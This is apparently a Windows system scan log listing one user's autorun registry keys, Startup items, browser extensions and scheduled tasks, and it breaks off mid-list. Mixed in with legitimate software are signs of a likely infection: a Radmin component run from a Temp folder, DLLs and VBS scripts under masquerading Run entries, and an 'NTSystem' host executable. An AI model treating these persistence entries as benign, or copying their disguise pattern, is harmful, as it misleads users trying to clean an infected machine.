x64Registry keyHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\Application\NVIDIA OpenGL Driver, EventMessageFile
C:\Program Files (x86)\Steam\bin\steamservice.exe
2600.35 kb, rsAh, created: 21.05.2018 19:39:38, modified: 21.07.2023 14:04:18
Script: Quarantine, Delete, Delete via BC
x64Registry keyHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\Application\Steam Client Service, EventMessageFile
C:\d3e0cf5d05ea7db318e90ab5\DW\DW20.exe
error getting file info
Script: Quarantine, Delete, Delete via BC
x64Registry keyHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\Application\VSSetup, EventMessageFile
v4.0.30319\EventLogMessages.dll
error getting file info
Script: Quarantine, Delete, Delete via BC
x64Registry keyHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\Application\VSTTAgentProcess, EventMessageFile
C:\WINDOWS\system32\eventlog.dll
error getting file info
Script: Quarantine, Delete, Delete via BC
x64Registry keyHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\Application\VSTTExecution, EventMessageFile
%13%\ax88179_178a.sys
error getting file info
Script: Quarantine, Delete, Delete via BC
x64Registry keyHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\System\AX88179, EventMessageFile
%13%\ax88179x_178a_772d.sys
error getting file info
Script: Quarantine, Delete, Delete via BC
x64Registry keyHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\System\AX88179A, EventMessageFile
C:\WINDOWS\System32\DriverStore\FileRepository\e1d68x64.inf_amd64_b44028fc7fdf4fca\e1dmsg.dll
error getting file info
Script: Quarantine, Delete, Delete via BC
x64Registry keyHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\System\e1dexpress, EventMessageFile
C:\WINDOWS\System32\drivers\iaStorAV.sys
error getting file info
Script: Quarantine, Delete, Delete via BC
x64Registry keyHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\System\iaStorAV, EventMessageFile
%13%\ibtusb.sys
error getting file info
Script: Quarantine, Delete, Delete via BC
x64Registry keyHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\System\ibtusb, EventMessageFile
C:\WINDOWS\system32\drivers\iaLPSS2_GPIO2_CNL.sys
error getting file info
Script: Quarantine, Delete, Delete via BC
x64Registry keyHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\System\Intel-iaLPSS2-GPIO2, EventMessageFile
C:\WINDOWS\System32\irmon.dll
error getting file info
Script: Quarantine, Delete, Delete via BC
x64Registry keyHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\System\irevents, EventMessageFile
C:\WINDOWS\System32\irmon.dll
error getting file info
Script: Quarantine, Delete, Delete via BC
x64Registry keyHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\System\irevents, CategoryMessageFile
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\msedge.dll
error getting file info
Script: Quarantine, Delete, Delete via BC
x64Registry keyHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\System\Microsoft Edge Etw, EventMessageFile
C:\WINDOWS\system32\drivers\nvdimmn.sys
error getting file info
Script: Quarantine, Delete, Delete via BC
x64Registry keyHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\System\Microsoft-Windows-NvdimmN, EventMessageFile
C:\WINDOWS\System32\Drivers\UMDF\UsbccidDriver.dll
error getting file info
Script: Quarantine, Delete, Delete via BC
x64Registry keyHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\System\Microsoft-Windows-USB-CCID, EventMessageFile
C:\WINDOWS\UUS\x86\wuauengcore.dll
error getting file info
Script: Quarantine, Delete, Delete via BC
x64Registry keyHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\System\Microsoft-Windows-WindowsUpdateClient, EventMessageFile
C:\WINDOWS\System32\drivers\nvdimmn.sys
error getting file info
Script: Quarantine, Delete, Delete via BC
x64Registry keyHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\System\nvdimmn, EventMessageFile
C:\WINDOWS\System32\RstMwEventLogMsg.dll
error getting file info
Script: Quarantine, Delete, Delete via BC
x64Registry keyHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\System\RST Middleware, EventMessageFile
C:\WINDOWS\System32\Drivers\uefi.sys
error getting file info
Script: Quarantine, Delete, Delete via BC
x64Registry keyHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\System\UEFI, EventMessageFile
C:\WINDOWS\System32\drivers\xvdd.sys
error getting file info
Script: Quarantine, Delete, Delete via BC
x64Registry keyHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\System\Xvdd, EventMessageFile
C:\Users\Isaac\AppData\Local\Temp\fd369298e4\jweupdater.exe
833132.36 kb, rsah, created: 05.03.2023 23:23:54, modified: 05.03.2023 23:21:53
Script: Quarantine, Delete, Delete via BC
x64File in Startup folderC:\Users\Isaac\AppData\Local\Temp\fd369298e4\, C:\Users\Isaac\AppData\Local\Temp\fd369298e4\jweupdater.exe,
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC
x64Shortcut in Startup folderC:\Users\Isaac\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\, C:\Users\Isaac\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk,
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
3992.45 kb, rsAh, created: 22.05.2021 04:55:33, modified: 21.07.2023 02:00:56
Script: Quarantine, Delete, Delete via BC
x64Shortcut in Startup folderC:\Users\Isaac\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\, C:\Users\Isaac\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Microsoft Edge.lnk,
C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe
4765.48 kb, rsAh, created: 25.10.2020 18:19:48, modified: 29.10.2020 17:24:00
Script: Quarantine, Delete, Delete via BC
x64Shortcut in Startup folderC:\Users\Isaac\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\, C:\Users\Isaac\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Voicemod.lnk,
C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
731.08 kb, rsAh, created: 14.06.2023 14:38:30, modified: 14.06.2023 14:38:30
Script: Quarantine, Delete, Delete via BC
x32Registry keyHKEY_LOCAL_MACHINE, Software\Microsoft\Windows\CurrentVersion\Run, SunJavaUpdateSched
Delete
C:\Program Files (x86)\Steam\steam.exe
4271.85 kb, rsAh, created: 21.05.2018 19:30:20, modified: 21.07.2023 14:04:18
Script: Quarantine, Delete, Delete via BC
x32Registry keyHKEY_CURRENT_USER, Software\Microsoft\Windows\CurrentVersion\Run, Steam
Delete
C:\Program Files\NZXT CAM\NZXT
error getting file info
Script: Quarantine, Delete, Delete via BC
x32Registry keyHKEY_CURRENT_USER, Software\Microsoft\Windows\CurrentVersion\Run, NZXT.CAM
Delete
CAM.exe
error getting file info
Script: Quarantine, Delete, Delete via BC
x32Registry keyHKEY_CURRENT_USER, Software\Microsoft\Windows\CurrentVersion\Run, NZXT.CAM
Delete
Discord.exe
error getting file info
Script: Quarantine, Delete, Delete via BC
x32Registry keyHKEY_CURRENT_USER, Software\Microsoft\Windows\CurrentVersion\Run, Discord
Delete
C:\Program Files (x86)\Epic Games\Launcher\Portal\Binaries\Win64\EpicGamesLauncher.exe
31986.45 kb, rsAh, created: 06.05.2020 00:58:34, modified: 10.01.2023 22:46:52
Script: Quarantine, Delete, Delete via BC
x32Registry keyHKEY_CURRENT_USER, Software\Microsoft\Windows\CurrentVersion\Run, EpicGamesLauncher
Delete
C:\Users\Isaac\AppData\Local\Microsoft\OneDrive\OneDrive.exe
2546.42 kb, rsAh, created: 22.04.2020 08:12:15, modified: 22.07.2023 00:30:13
Script: Quarantine, Delete, Delete via BC
x32Registry keyHKEY_CURRENT_USER, Software\Microsoft\Windows\CurrentVersion\Run, OneDrive
Delete
C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\EALauncher.exe
2610.10 kb, rsAh, created: 15.07.2023 00:27:26, modified: 15.07.2023 00:27:26
Script: Quarantine, Delete, Delete via BC
x32Registry keyHKEY_CURRENT_USER, Software\Microsoft\Windows\CurrentVersion\Run, EADM
Delete
C:\Program Files (x86)\Overwolf\OverwolfLauncher.exe
1744.01 kb, rsAh, created: 16.07.2023 07:09:04, modified: 16.07.2023 07:09:04
Script: Quarantine, Delete, Delete via BC
x32Registry keyHKEY_CURRENT_USER, Software\Microsoft\Windows\CurrentVersion\Run, Overwolf
Delete
C:\Users\Isaac\AppData\Roaming\uTorrent Web\utweb.exe
6264.66 kb, rsAh, created: 16.11.2022 17:57:48, modified: 16.11.2022 17:57:48
Script: Quarantine, Delete, Delete via BC
x32Registry keyHKEY_CURRENT_USER, Software\Microsoft\Windows\CurrentVersion\Run, utweb
Delete
C:\Riot Games\Riot Client\RiotClientServices.exe
69080.41 kb, rsAh, created: 22.04.2020 01:23:26, modified: 21.07.2023 01:52:34
Script: Quarantine, Delete, Delete via BC
x32Registry keyHKEY_CURRENT_USER, Software\Microsoft\Windows\CurrentVersion\Run, RiotClient
Delete
C:\Users\Isaac\AppData\Roaming\1000071060\rwfacade.dll
1302.60 kb, rsAh, created: 05.03.2023 23:25:56, modified: 05.03.2023 23:25:57
Script: Quarantine, Delete, Delete via BC
x32Registry keyHKEY_CURRENT_USER, Software\Microsoft\Windows\CurrentVersion\Run, rwfacade.dll
Delete
C:\Users\Isaac\AppData\Roaming\1000072060\rlmp32wlve.dll
1190.61 kb, rsAh, created: 05.03.2023 23:25:57, modified: 05.03.2023 23:25:58
Script: Quarantine, Delete, Delete via BC
x32Registry keyHKEY_CURRENT_USER, Software\Microsoft\Windows\CurrentVersion\Run, rlmp32wlve.dll
Delete
C:\Users\Isaac\AppData\Roaming\1000079060\rlmp32wce.dll
14310.47 kb, rsAh, created: 19.03.2023 20:54:11, modified: 19.03.2023 20:57:05
Script: Quarantine, Delete, Delete via BC
x32Registry keyHKEY_CURRENT_USER, Software\Microsoft\Windows\CurrentVersion\Run, rlmp32wce.dll
Delete
C:\Users\Isaac\AppData\Roaming\NTSystem\ntlhost.exe
794610.50 kb, rsAh, created: 01.04.2023 12:36:36, modified: 01.04.2023 12:36:37
Script: Quarantine, Delete, Delete via BC
x32Registry keyHKEY_CURRENT_USER, Software\Microsoft\Windows\CurrentVersion\Run, NTSystem
Delete
C:\Users\Isaac\AppData\Roaming\1000107060\ntredirect.dll
19455.50 kb, rsAh, created: 02.04.2023 17:53:25, modified: 02.04.2023 17:58:52
Script: Quarantine, Delete, Delete via BC
x32Registry keyHKEY_CURRENT_USER, Software\Microsoft\Windows\CurrentVersion\Run, ntredirect.dll
Delete
C:\Users\Isaac\AppData\Roaming\tMaIE.vbs
0.13 kb, rsAh, created: 11.04.2023 21:19:38, modified: 11.04.2023 21:19:38
Script: Quarantine, Delete, Delete via BC
x32Registry keyHKEY_CURRENT_USER, Software\Microsoft\Windows\CurrentVersion\Run, RuntimeBroker_tMaIE
Delete
C:\Users\Isaac\AppData\Roaming\xtuvv.vbs
0.13 kb, rsAh, created: 28.04.2023 21:58:57, modified: 28.04.2023 21:58:57
Script: Quarantine, Delete, Delete via BC
x32Registry keyHKEY_CURRENT_USER, Software\Microsoft\Windows\CurrentVersion\Run, RuntimeBroker_xtuvv
Delete
C:\Users\Isaac\AppData\Roaming\GmfIK.vbs
0.13 kb, rsAh, created: 28.04.2023 21:58:58, modified: 28.04.2023 21:58:58
Script: Quarantine, Delete, Delete via BC
x32Registry keyHKEY_CURRENT_USER, Software\Microsoft\Windows\CurrentVersion\Run, RuntimeBroker_GmfIK
Delete
C:\Users\Isaac\AppData\Local\Grammarly\DesktopIntegrations\Grammarly.Desktop.exe
741.42 kb, rsAh, created: 26.05.2023 06:56:58, modified: 26.05.2023 06:56:58
Script: Quarantine, Delete, Delete via BC
x32Registry keyHKEY_CURRENT_USER, Software\Microsoft\Windows\CurrentVersion\Run, Grammarly
Delete
C:\Users\Isaac\AppData\Roaming\1000219050\unsecapp.exe
150.51 kb, rsAh, created: 29.05.2023 15:53:02, modified: 29.05.2023 15:53:03
Script: Quarantine, Delete, Delete via BC
x32Registry keyHKEY_CURRENT_USER, Software\Microsoft\Windows\CurrentVersion\Run, unsecapp.exe
Delete
C:\Program Files\LGHUB\lghub.exe
148462.75 kb, rsAh, created: 23.06.2023 12:22:48, modified: 23.06.2023 12:22:46
Script: Quarantine, Delete, Delete via BC
x32Registry keyHKEY_CURRENT_USER, Software\Microsoft\Windows\CurrentVersion\Run, LGHUB
Delete
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
3992.45 kb, rsAh, created: 22.05.2021 04:55:33, modified: 21.07.2023 02:00:56
Script: Quarantine, Delete, Delete via BC
x32Registry keyHKEY_CURRENT_USER, Software\Microsoft\Windows\CurrentVersion\Run, MicrosoftEdgeAutoLaunch_E61B34E8EC343F2555F1806FED7939D1
Delete
C:\WINDOWS\system32\bootim.exe
error getting file info
Script: Quarantine, Delete, Delete via BC
x32Registry keyHKEY_LOCAL_MACHINE, System\CurrentControlSet\Control\Session Manager\, BootShell
C:\WINDOWS\System32\win32k.sys
error getting file info
Script: Quarantine, Delete, Delete via BC
x32Registry keyHKEY_LOCAL_MACHINE, System\CurrentControlSet\Control\Session Manager\SubSystems, Kmode
C:\WINDOWS\system32\vp6vfw.dll
error getting file info
Script: Quarantine, Delete, Delete via BC
x32Registry keyHKEY_LOCAL_MACHINE, Software\Microsoft\Windows NT\CurrentVersion\Drivers32, vidc.VP60
Delete
C:\WINDOWS\system32\vp6vfw.dll
error getting file info
Script: Quarantine, Delete, Delete via BC
x32Registry keyHKEY_LOCAL_MACHINE, Software\Microsoft\Windows NT\CurrentVersion\Drivers32, vidc.VP61
Delete
C:\Windows\System32\OneDriveSetup.exe
error getting file info
Script: Quarantine, Delete, Delete via BC
x32Registry keyHKEY_USERS, S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Run, OneDriveSetup
Delete
C:\Windows\System32\OneDriveSetup.exe
error getting file info
Script: Quarantine, Delete, Delete via BC
x32Registry keyHKEY_USERS, S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Run, OneDriveSetup
Delete
C:\Program Files\Riot Vanguard\vgtray.exe
3016.35 kb, rsAh, created: 12.08.2020 12:52:11, modified: 19.06.2023 10:53:39
Script: Quarantine, Delete, Delete via BC
x64Registry keyHKEY_LOCAL_MACHINE, Software\Microsoft\Windows\CurrentVersion\Run, Riot Vanguard
Delete
C:\Program Files (x86)\Steam\steam.exe
4271.85 kb, rsAh, created: 21.05.2018 19:30:20, modified: 21.07.2023 14:04:18
Script: Quarantine, Delete, Delete via BC
x64Registry keyHKEY_CURRENT_USER, Software\Microsoft\Windows\CurrentVersion\Run, Steam
Delete
C:\Program Files\NZXT CAM\NZXT
error getting file info
Script: Quarantine, Delete, Delete via BC
x64Registry keyHKEY_CURRENT_USER, Software\Microsoft\Windows\CurrentVersion\Run, NZXT.CAM
Delete
CAM.exe
error getting file info
Script: Quarantine, Delete, Delete via BC
x64Registry keyHKEY_CURRENT_USER, Software\Microsoft\Windows\CurrentVersion\Run, NZXT.CAM
Delete
Discord.exe
error getting file info
Script: Quarantine, Delete, Delete via BC
x64Registry keyHKEY_CURRENT_USER, Software\Microsoft\Windows\CurrentVersion\Run, Discord
Delete
C:\Program Files (x86)\Epic Games\Launcher\Portal\Binaries\Win64\EpicGamesLauncher.exe
31986.45 kb, rsAh, created: 06.05.2020 00:58:34, modified: 10.01.2023 22:46:52
Script: Quarantine, Delete, Delete via BC
x64Registry keyHKEY_CURRENT_USER, Software\Microsoft\Windows\CurrentVersion\Run, EpicGamesLauncher
Delete
C:\Users\Isaac\AppData\Local\Microsoft\OneDrive\OneDrive.exe
2546.42 kb, rsAh, created: 22.04.2020 08:12:15, modified: 22.07.2023 00:30:13
Script: Quarantine, Delete, Delete via BC
x64Registry keyHKEY_CURRENT_USER, Software\Microsoft\Windows\CurrentVersion\Run, OneDrive
Delete
C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\EALauncher.exe
2610.10 kb, rsAh, created: 15.07.2023 00:27:26, modified: 15.07.2023 00:27:26
Script: Quarantine, Delete, Delete via BC
x64Registry keyHKEY_CURRENT_USER, Software\Microsoft\Windows\CurrentVersion\Run, EADM
Delete
C:\Program Files (x86)\Overwolf\OverwolfLauncher.exe
1744.01 kb, rsAh, created: 16.07.2023 07:09:04, modified: 16.07.2023 07:09:04
Script: Quarantine, Delete, Delete via BC
x64Registry keyHKEY_CURRENT_USER, Software\Microsoft\Windows\CurrentVersion\Run, Overwolf
Delete
C:\Users\Isaac\AppData\Roaming\uTorrent Web\utweb.exe
6264.66 kb, rsAh, created: 16.11.2022 17:57:48, modified: 16.11.2022 17:57:48
Script: Quarantine, Delete, Delete via BC
x64Registry keyHKEY_CURRENT_USER, Software\Microsoft\Windows\CurrentVersion\Run, utweb
Delete
C:\Riot Games\Riot Client\RiotClientServices.exe
69080.41 kb, rsAh, created: 22.04.2020 01:23:26, modified: 21.07.2023 01:52:34
Script: Quarantine, Delete, Delete via BC
x64Registry keyHKEY_CURRENT_USER, Software\Microsoft\Windows\CurrentVersion\Run, RiotClient
Delete
C:\Users\Isaac\AppData\Roaming\1000071060\rwfacade.dll
1302.60 kb, rsAh, created: 05.03.2023 23:25:56, modified: 05.03.2023 23:25:57
Script: Quarantine, Delete, Delete via BC
x64Registry keyHKEY_CURRENT_USER, Software\Microsoft\Windows\CurrentVersion\Run, rwfacade.dll
Delete
C:\Users\Isaac\AppData\Roaming\1000072060\rlmp32wlve.dll
1190.61 kb, rsAh, created: 05.03.2023 23:25:57, modified: 05.03.2023 23:25:58
Script: Quarantine, Delete, Delete via BC
x64Registry keyHKEY_CURRENT_USER, Software\Microsoft\Windows\CurrentVersion\Run, rlmp32wlve.dll
Delete
C:\Users\Isaac\AppData\Roaming\1000079060\rlmp32wce.dll
14310.47 kb, rsAh, created: 19.03.2023 20:54:11, modified: 19.03.2023 20:57:05
Script: Quarantine, Delete, Delete via BC
x64Registry keyHKEY_CURRENT_USER, Software\Microsoft\Windows\CurrentVersion\Run, rlmp32wce.dll
Delete
C:\Users\Isaac\AppData\Roaming\NTSystem\ntlhost.exe
794610.50 kb, rsAh, created: 01.04.2023 12:36:36, modified: 01.04.2023 12:36:37
Script: Quarantine, Delete, Delete via BC
x64Registry keyHKEY_CURRENT_USER, Software\Microsoft\Windows\CurrentVersion\Run, NTSystem
Delete
C:\Users\Isaac\AppData\Roaming\1000107060\ntredirect.dll
19455.50 kb, rsAh, created: 02.04.2023 17:53:25, modified: 02.04.2023 17:58:52
Script: Quarantine, Delete, Delete via BC
x64Registry keyHKEY_CURRENT_USER, Software\Microsoft\Windows\CurrentVersion\Run, ntredirect.dll
Delete
C:\Users\Isaac\AppData\Roaming\tMaIE.vbs
0.13 kb, rsAh, created: 11.04.2023 21:19:38, modified: 11.04.2023 21:19:38
Script: Quarantine, Delete, Delete via BC
x64Registry keyHKEY_CURRENT_USER, Software\Microsoft\Windows\CurrentVersion\Run, RuntimeBroker_tMaIE
Delete
C:\Users\Isaac\AppData\Roaming\xtuvv.vbs
0.13 kb, rsAh, created: 28.04.2023 21:58:57, modified: 28.04.2023 21:58:57
Script: Quarantine, Delete, Delete via BC
x64Registry keyHKEY_CURRENT_USER, Software\Microsoft\Windows\CurrentVersion\Run, RuntimeBroker_xtuvv
Delete
C:\Users\Isaac\AppData\Roaming\GmfIK.vbs
0.13 kb, rsAh, created: 28.04.2023 21:58:58, modified: 28.04.2023 21:58:58
Script: Quarantine, Delete, Delete via BC
x64Registry keyHKEY_CURRENT_USER, Software\Microsoft\Windows\CurrentVersion\Run, RuntimeBroker_GmfIK
Delete
C:\Users\Isaac\AppData\Local\Grammarly\DesktopIntegrations\Grammarly.Desktop.exe
741.42 kb, rsAh, created: 26.05.2023 06:56:58, modified: 26.05.2023 06:56:58
Script: Quarantine, Delete, Delete via BC
x64Registry keyHKEY_CURRENT_USER, Software\Microsoft\Windows\CurrentVersion\Run, Grammarly
Delete
C:\Users\Isaac\AppData\Roaming\1000219050\unsecapp.exe
150.51 kb, rsAh, created: 29.05.2023 15:53:02, modified: 29.05.2023 15:53:03
Script: Quarantine, Delete, Delete via BC
x64Registry keyHKEY_CURRENT_USER, Software\Microsoft\Windows\CurrentVersion\Run, unsecapp.exe
Delete
C:\Program Files\LGHUB\lghub.exe
148462.75 kb, rsAh, created: 23.06.2023 12:22:48, modified: 23.06.2023 12:22:46
Script: Quarantine, Delete, Delete via BC
x64Registry keyHKEY_CURRENT_USER, Software\Microsoft\Windows\CurrentVersion\Run, LGHUB
Delete
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
3992.45 kb, rsAh, created: 22.05.2021 04:55:33, modified: 21.07.2023 02:00:56
Script: Quarantine, Delete, Delete via BC
x64Registry keyHKEY_CURRENT_USER, Software\Microsoft\Windows\CurrentVersion\Run, MicrosoftEdgeAutoLaunch_E61B34E8EC343F2555F1806FED7939D1
Delete
C:\PROGRA~1\VIRTUA~2\VIRTUA~4.DLL
131.71 kb, rsAh, created: 03.12.2022 11:14:42, modified: 03.12.2022 11:14:42
Script: Quarantine, Delete, Delete via BC
x64Registry keyHKEY_LOCAL_MACHINE, Software\Microsoft\Windows NT\CurrentVersion\Windows, AppInit_DLLs
C:\Users\Isaac\AppData\Local\MEGAsync\ShellExtX64.dll
error getting file info
Script: Quarantine, Delete, Delete via BC
x64Registry keyHKEY_LOCAL_MACHINE, Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved, {05B38830-F4E9-4329-978B-1DD28605D202}
Delete
C:\Users\Isaac\AppData\Local\MEGAsync\ShellExtX64.dll
error getting file info
Script: Quarantine, Delete, Delete via BC
x64Registry keyHKEY_LOCAL_MACHINE, Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved, {056D528D-CE28-4194-9BA3-BA2E9197FF8C}
Delete
C:\Users\Isaac\AppData\Local\MEGAsync\ShellExtX64.dll
error getting file info
Script: Quarantine, Delete, Delete via BC
x64Registry keyHKEY_LOCAL_MACHINE, Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved, {0596C850-7BDD-4C9D-AFDF-873BE6890637}
Delete
Items found - 1191, recognized as trusted - 1094

Internet Explorer extension modules (BHOs, Toolbars ...)

File name Redirector Type Description Manufacturer CLSID
C:\Program Files (x86)\Microsoft\Edge\Application\115.0.1901.183\BHO\ie_to_edge_bho.dll
445.44 kb, rsAh, created: 23.07.2023 03:50:03, modified: 21.07.2023 02:01:11
Script: Quarantine, Delete, Delete via BC
x32BHOIEToEdge BHOCopyright Microsoft Corporation. All rights reserved.{1FD49718-1D00-4B19-AF5F-070AF6D5D54C}
Delete
C:\Program Files (x86)\Microsoft\Edge\Application\115.0.1901.183\BHO\ie_to_edge_bho_64.dll
573.94 kb, rsAh, created: 23.07.2023 03:50:03, modified: 21.07.2023 02:01:25
Script: Quarantine, Delete, Delete via BC
x64BHOIEToEdge BHOCopyright Microsoft Corporation. All rights reserved.{1FD49718-1D00-4B19-AF5F-070AF6D5D54C}
Delete
C:\Program Files\Java\jre-1.8\bin\ssv.dll
726.63 kb, rsAh, created: 14.06.2023 14:21:28, modified: 14.06.2023 14:21:28
Script: Quarantine, Delete, Delete via BC
x64BHOJava(TM) Platform SE binaryCopyright © 2023{761497BB-D6F0-462C-B6EB-D4DAF1D92D43}
Delete
C:\Program Files\Java\jre-1.8\bin\jp2ssv.dll
357.63 kb, rsAh, created: 14.06.2023 14:20:16, modified: 14.06.2023 14:20:16
Script: Quarantine, Delete, Delete via BC
x64BHOJava(TM) Platform SE binaryCopyright © 2023{DBC80044-A445-435b-BC74-9C25C1C588A9}
Delete
Items found - 8, recognized as trusted - 4

Windows Explorer extension modules

File name Redirector Destination Description Manufacturer CLSID
C:\Users\Isaac\AppData\Local\MEGAsync\ShellExtX64.dll
error getting file info
Script: Quarantine, Delete, Delete via BC
x64 MEGA (Synced)  {05B38830-F4E9-4329-978B-1DD28605D202}
Delete
C:\Users\Isaac\AppData\Local\MEGAsync\ShellExtX64.dll
error getting file info
Script: Quarantine, Delete, Delete via BC
x64 MEGA (Pending)  {056D528D-CE28-4194-9BA3-BA2E9197FF8C}
Delete
C:\Users\Isaac\AppData\Local\MEGAsync\ShellExtX64.dll
error getting file info
Script: Quarantine, Delete, Delete via BC
x64 MEGA (Syncing)  {0596C850-7BDD-4C9D-AFDF-873BE6890637}
Delete
C:\Users\Isaac\AppData\Local\MEGAsync\ShellExtX64.dll
error getting file info
Script: Quarantine, Delete, Delete via BC
x64 MEGA (Synced)  {05B38830-F4E9-4329-978B-1DD28605D202}
Delete
C:\Users\Isaac\AppData\Local\MEGAsync\ShellExtX64.dll
error getting file info
Script: Quarantine, Delete, Delete via BC
x64 MEGA (Pending)  {056D528D-CE28-4194-9BA3-BA2E9197FF8C}
Delete
C:\Users\Isaac\AppData\Local\MEGAsync\ShellExtX64.dll
error getting file info
Script: Quarantine, Delete, Delete via BC
x64 MEGA (Syncing)  {0596C850-7BDD-4C9D-AFDF-873BE6890637}
Delete
Items found - 90, recognized as trusted - 84

Printing system extensions (print monitors, providers)

File name Redirector Name Type Description Manufacturer
Items found - 7, recognized as trusted - 7

Task Scheduler jobs

File name Redirector Job name Description Manufacturer Path Command line
C:\Program Files (x86)\bookingDesktopApp\Update\bookingDesktopAppUpdate.exe
100.00 kb, rsAh, created: 29.09.2020 19:53:40, modified: 29.09.2020 19:53:39
Script: Quarantine, Delete, Delete via BC
x64bookingDesktopAppUpdateTaskMachineCore
Script: Delete scheduler task
bookingDesktopApp UpdateCopyright 2007-2010 Google Inc.C:\WINDOWS\system32\Tasks\C:\Program Files (x86)\bookingDesktopApp\Update\bookingDesktopAppUpdate.exe /c
C:\Program Files (x86)\bookingDesktopApp\Update\bookingDesktopAppUpdate.exe
100.00 kb, rsAh, created: 29.09.2020 19:53:40, modified: 29.09.2020 19:53:39
Script: Quarantine, Delete, Delete via BC
x64bookingDesktopAppUpdateTaskMachineUA
Script: Delete scheduler task
bookingDesktopApp UpdateCopyright 2007-2010 Google Inc.C:\WINDOWS\system32\Tasks\C:\Program Files (x86)\bookingDesktopApp\Update\bookingDesktopAppUpdate.exe /ua /installsource scheduler
C:\Users\Isaac\AppData\Roaming\Google\Chrome\GoogleUpdateOnDemand.exe
19009.89 kb, rsAh, created: 06.04.2023 22:10:08, modified: 06.04.2023 22:10:08
Script: Quarantine, Delete, Delete via BC
x64GoogleUpdateTaskMachineQC
Script: Delete scheduler task
Google UpdateCopyright 2018 Google LLCC:\WINDOWS\system32\Tasks\C:\Users\Isaac\AppData\Roaming\Google\Chrome\GoogleUpdateOnDemand.exe
C:\Users\Isaac\AppData\Local\Temp\fd369298e4\jweupdater.exe
833132.36 kb, rsah, created: 05.03.2023 23:23:54, modified: 05.03.2023 23:21:53
Script: Quarantine, Delete, Delete via BC
x64jweupdater.exe
Script: Delete scheduler task
Radmin componentCopyright © 1999-2017 Famatech Corp. and its licensors. All rights reserved.C:\WINDOWS\system32\Tasks\C:\Users\Isaac\AppData\Local\Temp\fd369298e4\jweupdater.exe
C:\Program Files (x86)\GIGABYTE\EasyTuneEngineService\LiquidSensord.exe
245.72 kb, rsAh, created: 03.11.2020 10:51:12, modified: 03.11.2020 10:51:12
Script: Quarantine, Delete, Delete via BC
x64LiquidSensord
Script: Delete scheduler task
LiquidSensordCopyright © 2018 GIGA-BYTE TECHNOLOGY CO., LTD.C:\WINDOWS\system32\Tasks\"C:\Program Files (x86)\GIGABYTE\EasyTuneEngineService\LiquidSensord.exe"
C:\Program Files (x86)\Microsoft Visual Studio\Installer\resources\app\ServiceHub\Services\Microsoft.VisualStudio.Setup.Service\BackgroundDownload.exe
71.46 kb, rsAh, created: 16.04.2023 00:49:32, modified: 16.04.2023 00:49:20
Script: Quarantine, Delete, Delete via BC
x64BackgroundDownload
Script: Delete scheduler task
Visual Studio Background Download© Microsoft Corporation. All rights reserved.C:\WINDOWS\system32\Tasks\Microsoft\VisualStudio\Updates\C:\Program Files (x86)\Microsoft Visual Studio\Installer\resources\app\ServiceHub\Services\Microsoft.VisualStudio.Setup.Service\BackgroundDownload.exe
C:\WINDOWS\System32\MbaeParserTask.exe
error getting file info
Script: Quarantine, Delete, Delete via BC
x64MNO Metadata Parser
Script: Delete scheduler task
  C:\WINDOWS\system32\Tasks\Microsoft\Windows\Mobile Broadband Accounts\%SystemRoot%\System32\MbaeParserTask.exe
C:\Windows\System32\OOBE\SetupPlatform\SetupPlatform.exe
265.33 kb, RsAh, created: 23.07.2023 03:16:47, modified: 05.05.2023 09:21:22
Script: Quarantine, Delete, Delete via BC
x64SnapshotCleanupTask
Script: Delete scheduler task
SetupPlatform module© Microsoft Corporation. All rights reserved.C:\WINDOWS\system32\Tasks\Microsoft\Windows\Setup\C:\Windows\System32\OOBE\SetupPlatform\SetupPlatform.exe -removesnapshot
C:\WINDOWS\system32\MusNotification.exe
error getting file info
Script: Quarantine, Delete, Delete via BC
x64MusUx_UpdateInterval
Script: Delete scheduler task
